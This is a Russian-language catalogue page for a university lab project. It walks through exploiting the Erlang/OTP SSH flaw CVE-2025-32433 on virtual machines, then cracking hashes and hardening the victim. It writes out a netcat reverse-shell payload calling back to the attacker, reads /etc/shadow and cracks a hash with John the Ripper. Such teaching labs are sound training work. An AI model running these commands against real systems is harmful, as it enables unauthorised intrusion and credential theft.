Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Exploiting-a-vulnerability-using-reverse-shell — Этот проект имитирует реальный сценарий атаки и защиты на двух виртуальных машинах. Вы будете эксплуатировать критическую уязвимость удалённого выполнения кода до аутентификации (CVE-2025-32433) в SSH-сервере Erlang/OTP, взламывать извлечённые хеши паролей, а затем усиливать защиту атакованной машины с помощью правил брандмауэра и установки исправлений. | Kitploit
Инструменты/GitHubGitHub/dampedcoast/exploiting-a-vulnerability-using-reverse-shell
Взлом паролейАнализ уязвимостейЭксплуатацияСетевая безопасностьCTFТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

Этот проект имитирует реальный сценарий атаки и защиты на двух виртуальных машинах. Вы будете эксплуатировать критическую уязвимость удалённого выполнения кода до аутентификации (CVE-2025-32433) в SSH-сервере Erlang/OTP, взламывать извлечённые хеши паролей, а затем усиливать защиту атакованной машины с помощью правил брандмауэра и установки исправлений.

GitHub
dampedcoast/exploiting-a-vulnerability-using-reverse-shell

Exploiting-a-vulnerability-using-reverse-shell

Репозиторий
2 месяцев назадЕщё не проверено
Поделиться

Основы информационной безопасности — Проект Весна 2026

Всего баллов: 20 | Крайний срок: Опоздания не принимаются

Обзор

Этот проект моделирует реальный сценарий атаки и защиты на двух виртуальных машинах. Вы будете эксплуатировать критическую уязвимость RCE до аутентификации (CVE-2025-32433) в SSH-сервере Erlang/OTP, взламывать извлечённые хеши паролей, а затем укреплять машину-жертву с помощью правил брандмауэра и исправлений.

РольОС
АтакующийKali Linux
ЖертваUbuntu/Debian (Erlang/OTP SSH v27.3.2)

Файлы

ФайлОписание
Debian-1.ovaПредварительно созданный образ VM жертвы — скачайте отдельно, см. Ресурсы (слишком большой для GitHub)

Ресурсы

  • VM жертвы (Debian-1.ova): Ссылка для скачивания — слишком большой (~3ГБ) для размещения на GitHub. Скачайте отдельно и импортируйте в VirtualBox/VMware, как описано ниже.
  • Список слов (rockyou_txt.txt): включён в этот репозиторий, используется для шага взлома пароля в Части 2.

Настройка

  1. Импорт VM — Загрузите Debian-1.ova и вашу VM Kali Linux в VirtualBox/VMware.
  2. Сеть — Установите для обеих VM адаптер "Только хост" (Host-Only), чтобы они могли взаимодействовать в частной сети.
  3. IP жертвы — Загрузите жертву и выполните ifconfig, чтобы узнать её IP (обычно в 192.168.56.0/24).

Часть 1 — Развёртывание уязвимого SSH-сервера и эксплуатация (10 баллов)

Разведка

root@kitploit:~
nmap -p 2222 -sV -A <victim-IP>

Документируйте открытые порты, версии служб и сигнатуры Erlang.

Эксплойт CVE-2025-32433 (RCE до аутентификации)

Временно переключите Kali на NAT, чтобы клонировать репозиторий, затем вернитесь обратно на "Только хост".

root@kitploit:~
git clone https://github.com/ProDefense/CVE-2025-32433.git
cd CVE-2025-32433
sudo nano CVE-2025-32433.py

Отредактируйте скрипт — установите HOST = "<victim-IP>" и обновите payload:

root@kitploit:~
command='os:cmd("nc -e /bin/bash <Kali-IP> 4444").'

Терминал 1 (Kali) — запустите слушатель:

root@kitploit:~
nc -lvnp 4444

Терминал 2 (Kali) — запустите эксплойт:

root@kitploit:~
python3 CVE-2025-32433.py

В обратной оболочке выполните whoami и hostname, чтобы подтвердить доступ.


Часть 2 — Постэксплуатация и взлом паролей (5 баллов)

Извлечение и взлом хеша

root@kitploit:~
# On victim (via reverse shell)
cat /etc/shadow | grep testuser > hash.txt

# On Kali
john --wordlist=rockyou_txt.txt hash.txt

Документируйте формат хеша (например, $6$ = SHA-512), затраченное время и восстановленный пароль в открытом виде.

Поиск флага

root@kitploit:~
find / -iname "flag.txt" 2>/dev/null
cat /path/to/flag.txt

Часть 3 — Контроль и устранение последствий (5 баллов)

Блокировка вектора атаки (iptables)

root@kitploit:~
sudo iptables -A INPUT -p tcp --dport 2222 -j DROP

Повторно запустите сканирование Nmap и эксплойт с Kali — задокументируйте, что порт 2222 теперь "Отфильтрован" (Filtered) и эксплойт не работает.

Исправление уязвимости

Опишите шаги по обновлению Erlang/OTP до v27.3.3 или новее, которое содержит исправление для CVE-2025-32433.


Результаты

  • Полный отчёт со скриншотами: сканирования, выполнения эксплойта, обратной оболочки (whoami/hostname), захвата флага
  • Документация брандмауэра до/после (результаты Nmap, показывающие изменение состояния порта)
  • Письменное обоснование, объясняющее, почему RCE до аутентификации значительно опаснее эксплойтов после аутентификации

Ссылка на CVE

CVE-2025-32433 — Критическая удалённая выполнение кода до аутентификации на SSH-сервере Erlang/OTP. Эксплуатируется отправкой повреждённых SSH-пакетов до любого обмена учётными данными, предоставляя неаутентифицированному атакующему полный доступ к оболочке.

Скачать инструмент
Project Spring 2026 - Google Docs.pdfПолные инструкции проекта с результатами
rockyou_txt.txtСписок слов, используемый с John the Ripper для взлома извлечённого хеша пароля